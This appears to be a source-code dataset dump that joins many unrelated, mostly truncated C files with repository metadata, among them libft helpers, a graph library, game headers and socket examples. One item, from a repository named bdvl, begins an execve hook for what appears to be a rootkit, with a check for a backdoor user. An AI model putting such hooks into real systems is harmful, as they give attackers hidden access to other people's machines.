/*- * BSD LICENSE * * Copyright (c) Intel Corporation. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * * Redistributions of source code must retain the above copyri...
[ "tomasz.zawadzki@intel.com" ]
tomasz.zawadzki@intel.com
754bd2adb3bf7a9b27c99179bbf7a7cc4e403b84
4f0d5f5c083995001b7032c8e111fe01326915be
/libft/srcs/ft_strncmp.c
9f25124edcea75b36eb3566dead8b20ff98127d4
[]
no_license
ccazuc/ft_nmap
c78a68430c9daf88f381e7e97907a4bafd3f162e
0a1322ab7c93f11342a8b47b1ea4ac56317afc47
refs/heads/master
2022-07-02T18:14:23.025578
2020-05-14T10:21:39
2020-05-14T10:21:39
259,302,309
0
0
null
null
null
null
UTF-8
C
false
false
1,303
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_strncmp.c :+: :+: :+: ...
[ "clementoruss@gmail.com" ]
clementoruss@gmail.com
3abe69ee0d9a724dd5ae18a284cce13c09cdf97e
1b95f70720db3c404145bd637f46d32c0a145fb4
/Lab6-ex4.c
c18eef84149489af9b4ef3700795eb3e32813971
[]
no_license
chansem86/GitChanse
89a4c107b27c9ac3a61521e86a7fc3d49659a091
f69e3d9da60fa2533721faf1fc611afcfbd90183
refs/heads/master
2021-01-21T23:59:17.509182
2016-12-13T17:41:13
2016-12-13T17:41:13
68,307,039
1
0
null
null
null
null
UTF-8
C
false
false
263
c
#include<stdio.h> #include<string.h> void main() { int i=0; char arr1[ 20 ] = "Trumantiger";//set length to 20 char arr2[ 20 ]; while(i<20){ arr2[ i ] = 'A'; ++i; } strcpy( arr1 , arr2 ); printf("%s",arr1); }
[ "noreply@github.com" ]
chansem86.noreply@github.com
29c29ba88e11edfc29deea39003c29aef26f80c4
77aeabecfe7debae9c1fa9cd0d03fceee1309e0b
/graph.c
81720f1ed4e3f16a5922101e66118dd76ea7a3e3
[]
no_license
jgfn1/algorithms
764118f74cedc2c3fa3b18a2774a3fa6139d3e67
27b0e29f17ec7ce8aa531da8de1993989d8ade48
refs/heads/master
2021-03-27T19:52:06.726729
2017-07-12T03:01:42
2017-07-12T03:01:42
92,857,127
0
0
null
null
null
null
UTF-8
C
false
false
3,152
c
#include "stdio.h" #include "stdlib.h" typedef struct linked_list { struct linked_list* next; int value; } lists; typedef struct graph { lists* adj_list; lists** front; lists** rear; int vertex_number; int edge_number; } graphs; graphs* graph_insert(graphs* graph, int vertix1, int vertix2); void graph_print(g...
[ "jgfn@cin.ufpe.br" ]
jgfn@cin.ufpe.br
75fa6d6ea3d8b262cf7b9ec5b9395e99377a0708
32d404963376a396ee7ef518304b31f91694b79a
/Beta Weekend 1/DUMP/BP_Tree_DC_Palm_01_classes.h
117bb7fe6b49144821ff764aa22da7d59ad5bb6b
[]
no_license
TammelTin/Icarus-Dump
af2d1899491444924636b3903d5ee327a87d97c9
148c92b73f02add701816fd51fafc041145a635a
refs/heads/main
2023-08-11T02:58:04.032131
2021-09-10T12:16:02
2021-09-10T12:16:02
401,130,226
2
0
null
null
null
null
UTF-8
C
false
false
16,158
h
// BlueprintGeneratedClass BP_Tree_DC_Palm_01.BP_Tree_DC_Palm_01_C // Size: 0xa80 (Inherited: 0x4b8) struct ABP_Tree_DC_Palm_01_C : ABP_TreePrefab_C { struct UStaticMeshComponent* SM_DC_Palm_01_R_T1_T1_T1_T1_T1_T1_T1_L99; // 0x4b8(0x08) struct UStaticMeshComponent* SM_DC_Palm_01_R_T1_T1_T1_T1_T1_T1_T1_L98; // 0x4c0(0...
[ "30595413+TammelTin@users.noreply.github.com" ]
30595413+TammelTin@users.noreply.github.com
7508868a3389c7e60c4f3174209c4ce5f772d12a
49b41768bc240eb97b5d663cad1a114bbc432192
/project5/util.h
e67fb354e318e369d1f5f6f59035f4d91e72f8eb
[]
no_license
rajeevChaudhary/umn-csci4061-rajav-li
737aeb27c335ba3ace0798b6804ddf745c4648f7
8df0a2bf3280c88f5d16daf8237d050358c025eb
refs/heads/master
2021-01-10T05:38:22.641586
2011-12-14T19:32:59
2011-12-14T19:32:59
52,751,789
0
0
null
null
null
null
UTF-8
C
false
false
3,444
h
#ifndef _UTIL_H #define _UTIL_H /********************************************** * init - port is the number of the port you want the server to be started on - initializes the connection acception/handling system - YOU MUST CALL THIS EXACTLY ONCE (not once per thread, but exactly one time, in the main thread of ...
[ "jrajav@gmail.com" ]
jrajav@gmail.com
45a376328b4c8505e4f04241e31400ac83f5e5b0
0592c9e4cfbb77a0755aff6f0c798d9fe31f6ff4
/scilab/LiborMarketModel/lmm_cev/lmm_cev_pricer.h
3fb6e9be42a483697b30afd0a9435cd2295c1748
[]
no_license
FinancialEngineerLab/premia-13-cpp_FICC
e19caa6a9cadb4ad1361053efc0dfc9418071cf9
e271da627dbfc8c2c1f7e9f700766544f64c72b2
refs/heads/master
2023-03-16T11:11:26.830681
2016-04-19T05:58:16
2016-04-19T05:58:16
null
0
0
null
null
null
null
ISO-8859-2
C
false
false
3,200
h
#ifndef _LMM_CEV_ #define _LMM_CEV_ #include <stdlib.h> #include <math.h> #include <errno.h> #include <stdio.h> #include <time.h> /*Pricing function*/ //int_pts= MC or number of discretiz fore auxiliary functions void cev_price(size_t type_model,size_t type_product,size_t type_pricing, size_t type_scheme, double...
[ "jamanikun@gmail.com" ]
jamanikun@gmail.com
76399462e3f06f399814398f75c4ed1144810a43
430943b8fa997a19f0b97ed95521a237cf46bb86
/kernel/multiboot.c
438ef0081892749a6031760271c1d9afa60eda50
[]
no_license
ingrix/os
92624750ba5bb9983124adfec19facb0de88e960
af5954e23c25c0b5e031ddfd00ed0a1fd24856bd
refs/heads/master
2020-12-31T07:09:37.953485
2017-02-12T02:53:56
2017-02-12T02:53:56
80,553,277
0
0
null
null
null
null
UTF-8
C
false
false
2,157
c
#include <vga.h> #include <tty.h> #include <multiboot.h> #include <string.h> static struct multiboot_info g_mb_info = {0}; // magic: value in eax passed to the kernel from the bootloader int multiboot_check(uint32_t magic) { return magic == MULTIBOOT_MAGIC; } int _print_mb_message(uint32_t mbflags, uint32_t flag, ...
[ "ingrix@bigbluewhale.info" ]
ingrix@bigbluewhale.info
ff2ea29bd4fdf28240032efbeefb6d9b6364b79a
09157ef4d659e4df2ba1b22fd08b2d175f017281
/example/main.c
e6d36124d2d27298009494779a2527a38d74c1a6
[]
no_license
baylej/spine-allegro
41a618b19900f126fe501f5a2807df6e70745011
a96ac2874a0003941a71f60bbab7abc782358079
refs/heads/master
2021-01-10T19:19:35.583704
2014-06-04T15:21:18
2014-06-04T15:21:18
12,340,354
2
0
null
null
null
null
UTF-8
C
false
false
3,739
c
#include <stdlib.h> #include <stdio.h> #include <allegro5/allegro.h> #include <allegro5/allegro_primitives.h> #include <allegro5/allegro_image.h> #include <spine/spine.h> #include <spine/spine-allegro.h> SkeletonDrawable *drawable = NULL; spSkeletonData *skeletonData; spAtlas *atlas = NULL; void init_spineboy(void) ...
[ "baylej@mrhide.fr" ]
baylej@mrhide.fr
85062c460be436ba552f98de2faf06c999f3a3f1
c2b6bd54bef3c30e53c846e9cf57f1e44f8410df
/Temp/il2cppOutput/il2cppOutput/mscorlib_System_Collections_Generic_Dictionary_2_Tr699222221MethodDeclarations.h
1e5b732519066d21a1f4566d649f8cd8bd02119f
[]
no_license
PriyeshWani/CrashReproduce-5.4p1
549a1f75c848bf9513b2f966f2f500ee6c75ba42
03dd84f7f990317fb9026cbcc3873bc110b1051e
refs/heads/master
2021-01-11T12:04:21.140491
2017-01-24T14:01:29
2017-01-24T14:01:29
79,388,416
0
0
null
null
null
null
UTF-8
C
false
false
2,977
h
#pragma once #include "il2cpp-config.h" #ifndef _MSC_VER # include <alloca.h> #else # include <malloc.h> #endif #include <stdint.h> #include <assert.h> #include <exception> #include "codegen/il2cpp-codegen.h" #include "mscorlib_System_Object2689449295.h" #include "mscorlib_System_IntPtr2504060609.h" #include "msco...
[ "priyeshwani@gmail.com" ]
priyeshwani@gmail.com
2b04d8c26203bb9b1baf23584b0b7fa890c0701e
ae36c9c7be27de85f24ab6dd6d4bc1833eed1960
/Pointer/9.c
761ac7cc60f6e5ecf42e89ae36920185434be1cd
[]
no_license
nikhilpawade/Practise
dc8489d738cea65cd6044f7691b1004601484f7d
5e60d447362a8e24e92f615fdf01bcb16bd9832e
refs/heads/master
2022-09-26T20:28:03.804576
2022-08-04T11:03:52
2022-08-04T11:03:52
60,084,026
0
0
null
null
null
null
UTF-8
C
false
false
159
c
#include<stdio.h> int main() { int a[2] = {1, 2}; void *ptr = &a; ptr = ptr + sizeof(int); printf("%d", *(int *)ptr); return 0; }
[ "nikhil.pawade@sophos.com" ]
nikhil.pawade@sophos.com
217b3bc78f6f87dafa882812adcea2945cf40e9a
f4c3a3626f30b3bd7d1c648915287b303ffdfb64
/src/RaceSensor/src/drivers/leds.c
b6cea631d3b80091a2cf9b8a580a7ad13ab54675
[]
no_license
leodido99/TravailBachelor
e94ebe745418f09d9311cc9b8e50c2f27bb798f3
5bdaf04cfcd4b53a587562d0fbdb094cf6aacbdf
refs/heads/master
2021-07-24T14:48:40.899336
2018-11-02T10:53:16
2018-11-02T10:53:16
133,918,812
0
0
null
null
null
null
UTF-8
C
false
false
1,870
c
/** * @file leds.c * @brief LED Driver * * Provides a driver to manipulate the LEDs * * @author Léonard Bise * @date Jul 26, 2018 */ #include "leds.h" #include <board.h> #include <device.h> #include <gpio.h> #include "debug.h" #define DEBUG DEBUG_LEDS struct leds_private_t { struct device *led_red; str...
[ "leonard.bise@gmail.com" ]
leonard.bise@gmail.com
1e4a30423a2465beea42cda27eff1a91380e3694
26bb90958ebcbe30d58ed6c4787fd76006b2703c
/modules/exec/execve.c
b3d51922cfade89b70eb8af0d95b9e530a62f04c
[]
no_license
attackgithub/bdvl
64a78e6dfe682fae11754efa305d09068b40f1c3
139752a11c849764e9f4686bdab984942e75d86f
refs/heads/master
2020-05-15T22:38:04.791406
2019-04-08T15:19:32
2019-04-08T15:19:32
182,531,944
14
6
null
2019-04-21T12:44:56
2019-04-21T12:44:56
null
UTF-8
C
false
false
4,493
c
int execve(const char *filename, char *const argv[], char *const envp[]) { HOOK(o_execve, CEXECVE); HOOK(o_unlink,CUNLINK); HOOK(o_chown,CCHOWN); HOOK(o_xstat,C__XSTAT); if(is_bdusr()) { // do controller stuff // there's a script (etc/eutils.sh) that gets copied to the backdoor h...
[ "jackrowan16@gmail.com" ]
jackrowan16@gmail.com
fbd17eb50369ac41b24c6d47cc3909c45e0be0a5
bd8328e6434f9e9afff4f70a7935c65d1a36aa4d
/parser.h
d0d978d382f823c733a819b731263bd0cc731ab8
[]
no_license
OpesMentis/Convertor
085370b0749e36cf2679943f60c0798ef914cb79
ec0b513ccfab97347bab77a81ed436c47e329214
refs/heads/master
2020-07-07T06:45:41.156744
2016-09-08T14:52:27
2016-09-08T14:52:27
66,285,580
0
1
null
null
null
null
UTF-8
C
false
false
355
h
#ifndef PARSER_H #define PARSER_H #include <stdio.h> struct block { struct block * dad; struct block * bro; struct block * bro2; struct block * child; char keyword[20]; }; void addChild(struct block *dad, struct block *child); int getToken(FILE *f, char *tok); void parseMXIF(FILE *f, struct block *rac); void in...
[ "planchot.antoine@gmail.com" ]
planchot.antoine@gmail.com
5953f36b2b55ffc7b8dc0df1ff9e537150a759c7
f7c60ec100be42c0a57dfedb72aa867da30178c5
/src/basic.c
affbf38d1b085bb7b22cd32350c95431f65fd208
[]
no_license
hegemonies/mySimpleComputer
52b30680ea8f2bf4cecf691d5c1a928648263e5e
7dca1821943762b0d3cd5b943b491af9932f7da9
refs/heads/master
2021-05-03T11:08:23.018532
2018-06-24T08:42:26
2018-06-24T08:42:26
120,544,845
0
1
null
null
null
null
UTF-8
C
false
false
34,279
c
#include "basic.h" int basic_string_parser_first(char *str, int *i, unit_command *unit_commands, int *add_oper, char *name_var) { char *command_ = malloc(sizeof(char) * 10); int tmp_num_cell[6]; for (int k = 0; k < 6; k++) tmp_num_cell[k] = enemy_; int j; for (*i = 0, j = 0; str[*i] != '\0' && str[*i] != ' ' ...
[ "hegemonies@yandex.ru" ]
hegemonies@yandex.ru
86fc917cdd68eceeaeb906b43ed2fbfe84bbed3b
cd7c9dffa75cb1fe141e873263e2afdfd7092599
/srcs/ft_printf.c
6b9356f2360fe4aff28e61ea2b76e5a37f12b4d7
[]
no_license
vboled/Printf
44384e9cbb563c43b5fa5530c1e107f56ba0c287
777465ad05330b1c140c70cdac56e247d1fb4f8d
refs/heads/master
2021-07-16T09:51:33.087623
2020-10-19T19:18:26
2020-10-19T19:18:26
218,087,764
0
0
null
null
null
null
UTF-8
C
false
false
1,158
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_printf.c :+: :+: :+: ...
[ "vboled@gmail.com" ]
vboled@gmail.com
7adcb8c97f7132673070f10fd1ca905fa52b5326
17af871eb95f710006fdb82f31dbaa9dc75a2f47
/src/ratelimit.h
421fa1df8de900ae773e378cbe8350c5da74c14a
[]
no_license
AndrewBurian/tripwire
de5ada39a615ea8526599332cc01eb1f4faf1b18
cce4cb63baee58bc96adb4b4e37bfa761e9b20c9
refs/heads/master
2021-01-15T10:18:11.218694
2015-08-19T21:52:28
2015-08-19T21:52:28
41,061,578
0
0
null
null
null
null
UTF-8
C
false
false
275
h
#ifndef RATELIMIT_H #define RATELIMIT_H #include <time.h> struct rate_limit{ int rate_burst; time_t rate_period; time_t rate_last; long rate_count; }; struct rate_limit* init_limit(int burst, time_t period); int check_limit(struct rate_limit* limit, int inc); #endif
[ "andrew@burian.ca" ]
andrew@burian.ca
2f32ef059eee3ac43ae9b7c3f5a16b2d5cb9dfbf
63da3a98d7f7527f47ab1971f792da1b5784d867
/Lec09_Code/dyn_realloc_2_bu.c
6a6b023da24f9261ea19d3eadc9d6767fd2c2a15
[]
no_license
cding2/f21-cse20312
5c85222a9dbed0d7551bff6745574e57c4494998
1084f9d3a20a1b5de4971625f28b322898465d1f
refs/heads/main
2023-08-25T04:52:13.738586
2021-10-25T11:55:25
2021-10-25T11:55:25
null
0
0
null
null
null
null
UTF-8
C
false
false
1,069
c
#include <stdio.h> #include <stdlib.h> int main( void ){ long unsigned int init_len = 5; int* dyn_int_array = (int *)malloc( init_len * sizeof(int) ); char read_char = 'y'; long unsigned int num_read = 0; while( read_char == 'y' ){ int read_int; fprintf( stdout, "Enter an integer: "); fscanf( stdin, "%d...
[ "mmorri22@nd.edu" ]
mmorri22@nd.edu
f5b688dc352e42b7ed540d0e708234fc105a32b1
d45c2851c41bfac7a169236460a368ebf5032394
/Lab 4/simodyssey/EIFGENs/simodyssey1/F_code/C9/ty440.h
b42fa3b0d5cf9bfa4cc9f0b2682ea8af9ca12b1d
[]
no_license
GavinSit/EECS-3311-Software-Design
dd549ee44d7404a891e099e79d2545fefa502c57
c762d4a16643c4e9f2ae546a51fdddc9b5d6c952
refs/heads/main
2023-04-26T22:50:12.356097
2021-05-17T16:25:27
2021-05-17T16:25:27
null
0
0
null
null
null
null
UTF-8
C
false
false
769
h
#ifndef _C9_ty440_ #define _C9_ty440_ #ifdef __cplusplus extern "C" { #endif extern EIF_REFERENCE F1429_5288(EIF_REFERENCE); extern EIF_REFERENCE F1429_5289(EIF_REFERENCE, EIF_INTEGER_32); extern EIF_INTEGER_32 F1429_5290(EIF_REFERENCE); extern EIF_INTEGER_32 F1429_5291(EIF_REFERENCE); extern EIF_BOOLEAN F1429_5293(...
[ "gavin.sit22@gmail.com" ]
gavin.sit22@gmail.com
8c60a411df6f1ca2ced6022034a1aad442786c57
958a8450bc73eb3e0c6a3e7933b024c3e535ce2b
/Study/Study/Header.h
eb854639f91342f75de214aede6ce34964b23ff4
[ "MIT" ]
permissive
jisudong/study
0ae757ef8b59928c60077f696d309afafa731c59
0927a1f0e0fa37600b66cb95d7ff84bc77c4345e
refs/heads/master
2020-04-05T13:06:14.237460
2017-08-01T10:35:49
2017-08-01T10:35:49
95,080,023
0
0
null
null
null
null
UTF-8
C
false
false
216
h
// // Header.h // Study // // Created by 纪素东 on 2017/6/23. // Copyright © 2017年 syswin. All rights reserved. // #ifndef Header_h #define Header_h @import RxSwift @import RxCocoa #endif /* Header_h */
[ "136225101@qq.com" ]
136225101@qq.com
fcf24ab4ad70c5f4440bde1b0f7a17780568bf3c
cea27ba6416ad67d3f6208cb3383aa5238e66208
/LAB8-1/p7/main.c
36eb679c7cd81502f8df9b86a2b521092693e157
[]
no_license
bogdanpreda/C-University
91412c2e236fe5feac68ed2e9c2631c35273f139
e3806192a459141b226bf337f1864b9eb40330db
refs/heads/master
2021-01-17T19:20:22.251681
2016-06-04T10:04:03
2016-06-04T10:04:03
60,403,275
0
0
null
null
null
null
UTF-8
C
false
false
393
c
#include <stdio.h> #include <stdlib.h> int putere(int x,int put) { int i,p=1; for(i=1;i<=put;i++) { p*=x; } return p; } int main() { int x,n; printf("x= n="); scanf("%d %d",&x,&n); if(n>0) { printf("%d",putere(x,n)); } else { ...
[ "yomzx5@gmail.com" ]
yomzx5@gmail.com
7da63244a94597c476213cc0a8a718076f16b1d7
d558f5cde41eb8925c709965bcee3114e135b589
/res/src/end_screen_map_data.b3.c
897d5a80f907e3e3d5e44129be7a4d3279760aa5
[]
no_license
glowacki-dev/daft-boi
61cda2c7f38be4131fad3c29a396ccccb1493c36
aee9b7f1525f7e643679732a1f51a7eb4b30c53c
refs/heads/master
2022-01-05T23:08:54.646357
2019-05-12T23:04:41
2019-05-12T23:04:41
null
0
0
null
null
null
null
UTF-8
C
false
false
1,251
c
#define end_screen_map_dataWidth 0x0F #define end_screen_map_dataHeight 0x0E #define end_screen_map_dataBank 0 const unsigned char end_screen_map_data[] ={ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x...
[ "bombasarkadian@gmail.com" ]
bombasarkadian@gmail.com
2d64d0a8187204ea088245d027dc27b1f3705c76
d345a690a8e1e4022172c7a047afe6fc9f26eeee
/src/owasys-io-module.h
9e46930cf4ce9aa9a586c065bc9eb6a07f058f11
[]
no_license
zookzook/gsm-alarm-system
6ff4b4a04a718e41c93dfa8bb2a05dc343a0182d
4dd81e8fbb817067dca05078a4c0a2361dd61174
refs/heads/master
2021-04-15T02:12:47.583652
2020-03-22T22:39:01
2020-03-22T22:39:01
249,286,009
0
0
null
null
null
null
UTF-8
C
false
false
421
h
// // owasys-io-module.h // fleetdevice // // Created by Michael Maier on 25.10.17. // #ifndef owasys_io_module_h #define owasys_io_module_h #include <stdio.h> #include <stdbool.h> bool load_io_module( void ); void unload_io_module( void ); bool io_read_pin(unsigned char pin, bool *out); bool io_read_all_pin(unsi...
[ "michael.maier@vivai.de" ]
michael.maier@vivai.de
3e4bd268e950eb616c2d9385b748d5c2231992a0
04dd6c57b14b711e6241ae0950c4e9971ea58d31
/PSoC 6_101/1-3-HelloWorldCM4.cydsn/main_cm0p.c
940b1b0d89cb82dfc2e216708e499db55b74c1b4
[]
no_license
rainroshine1957/PSoC6-101-Video-Projects
d133649e2f303b1175000f9fa20220de4c9f2974
f14fdef6f139043df75729692fca43b562fdf6e8
refs/heads/master
2020-12-15T16:14:39.015845
2018-05-22T15:39:54
2018-05-22T15:39:54
null
0
0
null
null
null
null
UTF-8
C
false
false
568
c
/* ======================================== * * Copyright YOUR COMPANY, THE YEAR * All Rights Reserved * UNPUBLISHED, LICENSED SOFTWARE. * * CONFIDENTIAL AND PROPRIETARY INFORMATION * WHICH IS THE PROPERTY OF your company. * * ======================================== */ #include "project.h" int main(void) { ...
[ "gjl@cypress.com" ]
gjl@cypress.com
3aa36724ccf609de433dd3539196dbc741a5c72e
6aa47bcd59e3158b4ea73e70a6d5d0af7f9b4d7b
/accept.c
f350c0582313e26d6d627ef308026b5d4104d4ab
[]
no_license
fatehamin/Lab-4
9e22775ab0213032cb9b340f98fcdaf88c4126e3
06568881cefa5316fcfccf4d5c1d166e274afbf7
refs/heads/main
2023-01-20T05:22:52.938739
2020-11-16T16:24:11
2020-11-16T16:24:11
311,347,758
0
0
null
null
null
null
UTF-8
C
false
false
1,112
c
#include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> //inet_addr #include <string.h> //strlen #include <unistd.h> //write int main(int argc,char *argv[]) { int socket_desc, new_socket,c; struct sockaddr_in server,client; char *message; //Create socket socket_desc=socket(AF_INET,SOCK_STREAM,0); if(...
[ "hahalawak99@gmail.com" ]
hahalawak99@gmail.com
ee8750d6acc28a59f7eda05accb184387a56c5f8
296278a0b87aecb72e20f0ffc8d4802c731b40ce
/algorithm/CodingInterviews/array-reverse.h
a55f8113a3b1ede02770391b97d7ee727ba85c5a
[ "MIT" ]
permissive
kaynewbie/algorithm
8b20afec27a5f19c25025eb7f51ffc17719f8cd1
2b913ca583cce35757c6e33766e9226553f214fa
refs/heads/master
2021-06-17T11:11:34.796481
2021-04-11T14:31:05
2021-04-11T14:31:05
195,031,156
8
2
MIT
2019-08-28T11:49:42
2019-07-03T10:22:13
C
UTF-8
C
false
false
501
h
// // array-reverse.h // algorithm // // Created by Kai on 2019/7/11. // Copyright © 2019 kai. All rights reserved. // #ifndef array_reverse_h #define array_reverse_h #include <stdio.h> /* 递增排序数组,前m位平移到数组末尾,相当于变成了两个递增数组。在此数组中查找 target。 */ int reversedArray(int p[], int length, int target); void testreversedAr...
[ "kaynewbie@gmail.com" ]
kaynewbie@gmail.com
bcdfd8b82966d0b4cb98fe0c6430c0d51685fa09
363ed55c7e254a7ccfcc27a71ef1b7729dea28f3
/CSC Project1/Reference/code/packet_sniff_raw_subodh.c
2b8266cdd8a8a2c8b4d7dd060979ba77c824fdc1
[ "MIT" ]
permissive
KJ-black/Computer-Security-Capstone
28b5bf3741a72d4634097d8f460772806245bcab
b32159204172d9d2c4f359ad05d7d8ca49bf9085
refs/heads/main
2023-07-30T05:35:27.788034
2021-09-14T12:26:41
2021-09-14T12:26:41
406,350,302
0
0
null
null
null
null
UTF-8
C
false
false
6,465
c
/* Note: run this program as root user * Author:Subodh Saxena */ #include<stdio.h> #include<malloc.h> #include<string.h> #include<signal.h> #include<stdbool.h> #include<sys/socket.h> #include<sys/types.h> #include<linux/if_packet.h> #include<netinet/in.h> #include<netinet/if_ether.h> // for ether...
[ "noreply@github.com" ]
KJ-black.noreply@github.com
6d7bd6540e9ffec9f9d7bb01c984aafee939c998
d869590c1283955f209206075cb4d14270e8aace
/ft_isascii.c
71e7148b7a02e0e68d9c8e2dfcf2f90027fa4a16
[]
no_license
Kndrf/Libft
870095f626d1bb6c50a835b970e8b8617fe42fdb
9d8cfe064150352e5418eb9a4e5856b2069194a8
refs/heads/master
2021-04-25T04:31:45.024320
2017-12-18T10:31:17
2017-12-18T10:31:17
114,627,536
0
0
null
null
null
null
UTF-8
C
false
false
1,073
c
/* ************************************************************************** */ /* LE - / */ /* / */ /* ft_isascii.c .:: .:/ . .:: ...
[ "robihaap@z1r7p5.le-101.fr" ]
robihaap@z1r7p5.le-101.fr
8a4313e20f4dcce1d378011d4418c5274d13b33d
e6e589fa7722a052d3a9c6790d0a44521bbaaaab
/test.c
e3fe6fcd68129e7dc195e0e833efc456bbf44419
[]
no_license
victormn/CrackingTheCodingInterview
4262873e3481e4287678032a145ef96090a124e2
b6ab984f24bd3ca3c9346c3358799dc63433a102
refs/heads/master
2020-05-26T17:34:22.233946
2017-02-21T03:09:17
2017-02-21T03:09:17
82,484,480
0
0
null
null
null
null
UTF-8
C
false
false
184
c
#include <stdio.h> // Function int main(int argc, char const *argv[]) { // Inputs // Function call and return char[] ret = functionname(); printf("%s\n", ret); return 0; }
[ "victor.marcelino.nunes@usp.br" ]
victor.marcelino.nunes@usp.br
30a6bdf2d33dd00d524e4ed5db95821b9e7d75a9
82ba57f48a62e9d2ac9263b207d1eb255c098559
/06_data_type/03_float_pattern_print.c
3f68c6420e9c769124821287f16b289c8f2b23bd
[ "MIT" ]
permissive
ysl2/C-language-study
57f9da453f6a08d10cc82e8b100f46ccb89568cb
80baf0e608bb3a72a89751e172752a2d83149e02
refs/heads/master
2023-02-15T00:07:33.163189
2020-12-20T07:31:48
2020-12-20T07:31:48
261,751,566
1
0
null
null
null
null
UTF-8
C
false
false
166
c
#include <stdio.h> //%f的格式化输出 int main() { printf("%.3f\n", -0.0049); printf("%.30f\n", -0.0049); printf("%.3f\n", -0.00049); return 0; }
[ "1097985743@qq.com" ]
1097985743@qq.com
2a1d7134efaaf0d5f652e40e16ea3b9181d20759
ff79652147cce537ea5100fb99fcae60115ed72e
/gongdi/客户端图形化界面代码/gongdi/gongdi/resource.h
c0b258ebdfd035734a4d438a7c35c6027ad4f76f
[]
no_license
lxy252/gongdi
603dcce6e4e0ce9ad2e26e5576693d79eb500552
183edeec147b3ce0df1e54e4fc323455dd3f9f30
refs/heads/main
2023-02-16T18:50:00.584552
2021-01-15T10:41:51
2021-01-15T10:41:51
329,882,004
0
0
null
null
null
null
UTF-8
C
false
false
1,053
h
//{{NO_DEPENDENCIES}} // Microsoft Visual C++ 生成的包含文件。 // 供 gongdi.rc 使用 // #define IDM_ABOUTBOX 0x0010 #define IDD_ABOUTBOX 100 #define IDS_ABOUTBOX 101 #define IDD_GONGDI_DIALOG 102 #define IDR_MAINFRAME 128 #define IDC...
[ "noreply@github.com" ]
lxy252.noreply@github.com
e9729bfd54e2fd583de9e4c76529ddbd51c6cd80
9034f224a0810da25e553371610c71157f83aa74
/分队列/分队列.c
1fcff657b865b70893022d701fc92ac85dd32c4f
[]
no_license
ReWKing/StartToC
6e6eb8487e5fd796ddcf3fd900fac6f5ab8b1bcb
bae5c86d4788bc04ea631abccb470ed805232485
refs/heads/master
2020-03-23T01:37:02.156941
2018-10-13T13:13:34
2018-10-13T13:13:34
140,927,228
0
0
null
null
null
null
UTF-8
C
false
false
200
c
#include <stdio.h> main() { int num; int i = 0; scanf("%d", &num); do { printf("%d", 2*i + 1); if (2*(i+1) < num) printf(" "); i += 1; }while(2*i+1 <= num); }
[ "baymaxing@gmail.com" ]
baymaxing@gmail.com
fd874da767815dd63fc3ce15d725897f88a31f4c
b11b8619073e902adfb8a40943acf8d24e581eff
/gui/src/libmgutils/src/vcongui/paint.h
4c4d7f5e5cfd11457986e1697b7334c0ed657c2e
[]
no_license
wuyanxiong/miniGUI_DisplayDemo
e96741c5efb2c1ffd9069b72f5be8f8c397b0f6e
18d525e8dd1390c49def46d8845ec5b5a0cce5da
refs/heads/master
2020-06-02T01:51:43.369516
2019-06-13T16:28:59
2019-06-13T16:28:59
190,997,908
1
4
null
null
null
null
UTF-8
C
false
false
1,970
h
/* * This file is part of mGUtils, a component for MiniGUI. * * Copyright (C) 2003~2018, Beijing FMSoft Technologies Co., Ltd. * Copyright (C) 1998~2002, WEI Yongming * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as pub...
[ "beal.wu@mstarsemi.com" ]
beal.wu@mstarsemi.com
60aec32800e55b3a074936550d9b16840d4cfdb4
3d643e50e304d3ffd3f697905e441556be377cfc
/apps/bare-expo/ios/Pods/Headers/Public/ZXingObjC/ZXBookmarkDoCoMoResultParser.h
19cceaf4147f552c4dcbeff0a7c93306d64b878e
[ "BSD-3-Clause", "MIT", "Apache-2.0" ]
permissive
Qdigital/expo
326c5c1c0167295c173f2388f078a2f1e73835c9
8865a523d754b2332ffb512096da4998c18c9822
refs/heads/master
2023-07-07T18:37:39.814195
2020-02-18T23:28:20
2020-02-18T23:28:20
241,549,344
1
0
MIT
2023-07-06T14:55:15
2020-02-19T06:28:39
null
UTF-8
C
false
false
73
h
../../../ZXingObjC/ZXingObjC/client/result/ZXBookmarkDoCoMoResultParser.h
[ "noreply@github.com" ]
Qdigital.noreply@github.com
b3c4b0a909c4392b1c1b5aa4eac411a92f59a2eb
0095e38ead3b9b1ae0b62411f4d19dde69647cee
/i2d_print.h
32ebe695e394491fc6095a70eff613d7bd98e9d5
[]
no_license
trickyloki3/i2d
d223b63caaa171f176f71049acc0b4cdee1f3eac
99282b66bf1b0acab859072e6686465912c3b1f9
refs/heads/master
2021-05-02T06:00:59.315937
2019-07-03T04:00:03
2019-07-03T04:00:03
120,850,898
8
2
null
null
null
null
UTF-8
C
false
false
909
h
#ifndef i2d_print_h #define i2d_print_h #include "i2d_data.h" #include "i2d_json.h" #include "i2d_item.h" struct i2d_print { i2d_value_map * description_by_item_type; i2d_data_map * description_of_item_property; i2d_rbt * print_handlers; i2d_rbt * item_properties; i2d_buffer_cache * buffer_cache; ...
[ "tricky.loki3@gmail.com" ]
tricky.loki3@gmail.com
b2c1481497462413ced977795c7e793025101de0
66ec0dacfc6032f681d4160a22f22a270b8ddc71
/build/appinfo.auto.c
4f5cc9848e562037fa875f99a5fef3bcb5ae5308
[]
no_license
vidia/pebble-xtern
a8b07447a626b2e7d0dae96ee78675fd2dad4dc1
b750ef432977dd97b42993c54ad5cda8f6f609fb
refs/heads/master
2021-01-19T22:29:34.256028
2014-06-21T14:45:49
2014-06-21T14:45:49
21,070,775
0
0
null
null
null
null
UTF-8
C
false
false
782
c
#include "pebble_app_info.h" #include "src/resource_ids.auto.h" const PebbleAppInfo __pbl_app_info __attribute__ ((section (".pbl_header"))) = { .header = "PBLAPP", .struct_version = { APP_INFO_CURRENT_STRUCT_VERSION_MAJOR, APP_INFO_CURRENT_STRUCT_VERSION_MINOR }, .sdk_version = { APP_INFO_CURRENT_SDK_VERSION_MA...
[ "dmtschida1@gmail.com" ]
dmtschida1@gmail.com
0bd099c13a5db654ed79e5b5e7f110196e40a690
bf4de3c30950720a708bb0047007d71ec687e338
/mrbgems/mruby-io/src/io.c
